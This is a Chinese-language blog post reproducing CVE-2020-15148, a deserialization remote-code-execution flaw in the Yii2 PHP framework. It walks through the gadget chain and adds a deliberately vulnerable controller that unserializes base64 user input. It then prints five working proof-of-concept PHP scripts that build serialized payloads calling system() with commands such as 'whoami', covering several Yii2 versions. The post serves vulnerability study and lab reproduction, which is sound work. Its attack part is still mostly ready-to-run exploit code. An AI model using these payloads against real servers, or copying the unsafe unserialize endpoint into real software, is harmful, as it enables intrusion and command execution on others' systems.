yii2框架反序列化漏洞复现

yii

发布时间 : 2023-05-29 16:22

字数:1.5k 阅读 :

简介：
环境部署：
漏洞分析：
复现：

简介：

Yii Framework是一个基于组件、用于开发大型Web应用的高性能 PHP 框架。Yii提供了今日Web 2.0应用开发所需要的几乎一切功能。Yii是最有效率的PHP框架之一。

Yii2 2.0.38 之前的版本存在反序列化漏洞，程序在调用unserialize 时，攻击者可通过构造特定的恶意请求执行任意命令，CVE编号是CVE-2020-15148

环境部署：

下载地址：

https://github.com/yiisoft/yii2/releases/tag/2.0.37
//下载yii-basic-app-2.0.37.tgz

修改/config/web.php文件17行cookieValidationKey,值可以为任何

进入目录，执行php yii serve

此时就可以进入http://localhost:8080/

漏洞分析：

漏洞的出发点是在\yii\vendor\yiisoft\yii2\db\BatchQueryResult.php文件中

但是继续跟进close()，发现没什么利用的方法，但是这里的__dataReader是可控的，那么调用了close的方法，可以通过触发__call方法来进行利用。

全局搜索一下__call方法，在\vendor\fzaninotto\faker\src\Faker\Generator.php存在合适__call的方法：

因为close是无参方法，所以__call中的$method是close,attributes为空。继续跟进format方法：

(call_user_func_array：调用回调函数，并把一个数组参数作为回调函数的参数)

跟进getFormatter:

因为$this->formatters是可控的，因此getFormatter方法的返回值也是我们可控的，因此call_user_func_array($this->getFormatter($formatter), $arguments);中，回调函数是我们可控的，但是$arguments为空，所以相当于我们现在能干两件事，可以调用yii2中任意的一个无参方法，或者调用原生php的类似phpinfo()这样的无参方法，但是第二种肯定不能RCE，因此还要在yii2中已有的无参方法中进行挖掘（直接搜索含有call_user_function的无参函数）：
构造正则：

call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)

其中有两个类中的run方法可用：

yii\rest\CreateAction::run()，$this->checkAccess, $this->id两个参数可控

\yii\rest\IndexAction::run()，$this->checkAccess, $this->id两个参数可控

至此梳理一下pop链：

class BatchQueryResult  ->__destruct()
↓↓↓
class BatchQueryResult  ->reset()
↓↓↓
class Generator  ->__call()
↓↓↓
class Generator  ->format()
↓↓↓
class Generator  ->getFormatter()
↓↓↓
class IndexAction  ->run()

这里可以看一下其他师傅的一张图：

第一步：new了一个yii\db\BatchQueryResult()类，那么就会调用这个类的__construct()方法

第二步：这个类的__construct()方法会new一个Faker\Generator()类，就又会调用Faker\Generator()类的__construct()方法，并把这个对象赋值给$_dataReader变量。

第三步：Faker\Generator()类的__construct()方法会new一个yii\rest\CreateAction()类，然后又调用yii\rest\CreateAction()类的__coustrcut()方法。并调用了run方法（这里用了 call_user_func_array后面会讲到），然后赋值给$this->formatters[‘close’]。

第四步：反序列化时，类中变量的值我们是可控的；那么就可以通过yii\rest\CreateAction()类的__construct()方法中修改这些变量，将这些值改成命令，成功RCE。

复现：

这是一个反序列化利用链，所以还需要一个反序列化的入口点

在controllers目录下创建一个TestController.php:

<?php
namespace app\controllers; 
class TestController extends \yii\web\Controller
{
    public function actionTest($data){
        return unserialize(base64_decode($data));
    }
}
?>

大佬们的poc：

<?php
namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'dir';
        }
    }
}
namespace Faker {
    use yii\rest\IndexAction;
    class Generator
    {
        protected $formatters;
        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{
    use Faker\Generator;
    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace{
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

其他链子：

yiii 2.0.38

poc2

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'ls';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            // 这里需要改为isRunning
            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}
// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

poc3

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'dir';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            // 这里需要改为render
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
    use Faker\Generator;
    class See{
        protected $description;
        public function __construct()
        {
            $this->description = new Generator();
        }
    }
}
namespace{
    use phpDocumentor\Reflection\DocBlock\Tags\See;
    class Swift_KeyCache_DiskKeyCache{
        private $keys = [];
        private $path;
        public function __construct()
        {
            $this->path = new See;
            $this->keys = array(
                "axin"=>array("is"=>"handsome")
            );
        }
    }
    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>

yii 2.0.42

poc4

<?php
namespace Faker;
class DefaultGenerator{
    protected $default ;
    function __construct($argv)
    {
        $this->default = $argv;
    }
}
class ValidGenerator{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    function __construct($command,$argv)
    {
        $this->generator = new DefaultGenerator($argv);
        $this->validator = $command;
        $this->maxRetries = 99999999;
    }
}
namespace Codeception\Extension;
use Faker\ValidGenerator;
class RunProcess{
    private $processes = [];
    function __construct($command,$argv)
    {
        $this->processes[] = new ValidGenerator($command,$argv);
    }
}
$exp = new RunProcess('system','whoami');
echo(base64_encode(serialize($exp)));

poc5

<?php
namespace yii\rest
{
    class IndexAction{
        function __construct()
        {
            $this->checkAccess = 'system';
            $this->id = 'whoami';
        }
    }
}
namespace Symfony\Component\String
{
    use yii\rest\IndexAction;
    class LazyString
    {
        function __construct()
        {
            $this->value = [new indexAction(), "run"];
        }
    } 
    class UnicodeString
    {
        function __construct()
        {
            $this->value = new LazyString();
        }
    }
}
namespace Faker
{
    use Symfony\Component\String\LazyString;
    class DefaultGenerator
    {
        function __construct()
        {
            $this->default = new LazyString();
        }
    }
    class UniqueGenerator
    {
        function __construct()
        {
            $this->generator = new DefaultGenerator();
            $this->maxRetries = 99999999;
        }

    }
}
namespace Codeception\Extension
{
    use Faker\UniqueGenerator;
    class RunProcess
    {
        function __construct()
        {
            $this->processes[] = new UniqueGenerator();
        }
    }
}
namespace
{
    use Codeception\Extension\RunProcess;
    $exp = new RunProcess();
    echo(base64_encode(serialize($exp)));
}

yii 2.2.37

poc2

<?php
namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'whoami';
        }
    }
}
namespace yii\db{
    use yii\web\DbSession;
    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct(){
            $this->_dataReader=new DbSession();
        }
    }
}
namespace yii\web{
    use yii\rest\IndexAction;
    class DbSession
    {
        public $writeCallback;
        public function __construct(){
            $a=new IndexAction();
            $this->writeCallback=[$a,'run'];
        }
    }
}
namespace{
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。